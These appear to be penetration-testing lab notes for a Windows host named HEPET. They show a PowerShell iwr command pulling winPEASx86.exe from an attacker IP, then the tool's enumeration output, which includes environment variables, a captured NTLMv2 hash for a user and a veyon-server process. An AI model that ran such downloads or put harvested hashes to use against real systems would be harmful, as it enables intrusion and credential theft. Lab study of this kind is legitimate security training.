PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.153/winPEASx86.exe -OutFile C:\tmp\winPEASx86.exe
Delivery complete
Executing PEAS
ENV
User Environment Variables
Check for some passwords or keys in the env variables
Path: C:\Program Files\LibreOffice\program;C:\Program Files\LibreOffice\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\Ela Arwel\AppData\Local\Microsoft\WindowsApps
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
windir: C:\WINDOWS
USERDOMAIN: HEPET
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
DriverData: C:\Windows\System32\Drivers\DriverData
PUBLIC: C:\Users\Public
APPDATA: C:\Users\Ela Arwel\AppData\Roaming
URE_BOOTSTRAP: file:///C:/Program%20Files/LibreOffice/program/fundamental.ini
LOCALAPPDATA: C:\Users\Ela Arwel\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
LANGUAGE: en_US.UTF-8
OneDrive: C:\Users\Ela Arwel\OneDrive
USERPROFILE: C:\Users\Ela Arwel
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 25
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
HOMEPATH: \Users\Ela Arwel
COMPUTERNAME: HEPET
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: Ela Arwel
NUMBER_OF_PROCESSORS: 2
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
SystemRoot: C:\WINDOWS
ComSpec: C:\WINDOWS\system32\cmd.exe
LOGONSERVER: \\HEPET
TEMP: C:\Users\ELAARW~1\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
LIBO_VERSION: 7.0.2.2
CommonProgramFiles: C:\Program Files (x86)\Common Files
TMP: C:\Users\ELAARW~1\AppData\Local\Temp
USERDOMAIN_ROAMINGPROFILE: HEPET
PROCESSOR_REVISION: 0101
PROMPT: $P$G
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Users\Ela Arwel\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
OS: Windows_NT
PSExecutionPolicyPreference: Bypass
ProgramData: C:\ProgramData
HOMEDRIVE: C:
System Environment Variables
Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files (x86)\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
LAPS
LSA Protection
Credentials Guard
UAC
PowerShell
NTLM
Ela Arwel::HEPET:1122334455667788:9be8690291c593a032ec9347f1f6cbc2:01010000000000000680e5cd358ddb014fabc19a79fb5fd6000000000800300030000000000000000000000000200000fddba21abefbbfef27bcf4f1785a7040c72d7d3aec636c5ca8979886911e3b570a00100000000000000000000000000000000000090000000000000000000000
.NET Version
RDP Session
Processes
Services
Network
11100 veyon-server
Interesting Files/Directories